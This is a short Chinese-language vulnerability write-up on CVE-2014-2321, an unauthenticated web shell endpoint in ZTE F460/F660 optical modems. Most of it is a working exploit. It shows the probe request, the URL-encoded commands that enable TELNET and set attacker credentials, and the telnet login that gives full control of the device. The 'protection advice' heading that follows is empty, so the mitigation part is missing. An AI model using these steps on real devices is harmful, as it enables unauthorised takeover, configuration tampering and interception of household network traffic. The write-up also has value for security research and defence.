ZTE 光猫 Web Shell 漏洞(CVE-2014-2321) 是一个严重的安全问题,允许攻击者通过对未认证接口 /web_shell_cmd.gch 发起请求,执行系统命令并启用 TELNET 服务,最终获得设备的完全控制权限。
漏洞影响范围:
固件/嵌入式设备 → 未授权远程命令执行
攻击者无需认证,即可启用远程管理服务并设定凭证。
ZTE F460 和 F660 光猫设备暴露了一个 Web Shell 接口 /web_shell_cmd.gch,攻击者可向该接口发送参数如 set TelnetCfg 以开启 TELNET 服务,并设定登录用户名与密码,最终获得设备的 shell 权限。
攻击请求示例:
GET /web_shell_cmd.gch HTTP/1.1
Host: <目标地址>
返回内容示例:
please input shell command
ZTE Corporation. All rights reserved
攻击者随后可利用该接口执行如下命令:
set TelnetCfg 0 1 192.168.1.1
set TelnetCfg 1 username password
根本原因:
/web_shell_cmd.gch 接口做任何访问控制攻击者访问如下地址启用 TELNET:
http://<目标IP>/web_shell_cmd.gch?set+TelnetCfg+0+1+192.168.1.1
http://<目标IP>/web_shell_cmd.gch?set+TelnetCfg+1+attacker+password
随后即可通过 TELNET 登录设备:
telnet <目标IP>
用户名:admin / attacker
密码:password
效果: 攻击者完全控制目标设备,包括配置修改、流量中间人攻击、桥接远程内网等。
防护建议:
📝 作者:ahlien 📧 邮箱:mfs24@mails.tsinghua.edu.cn
🏫 单位:Tsinghua University
📅 最后更新时间:2025-07-30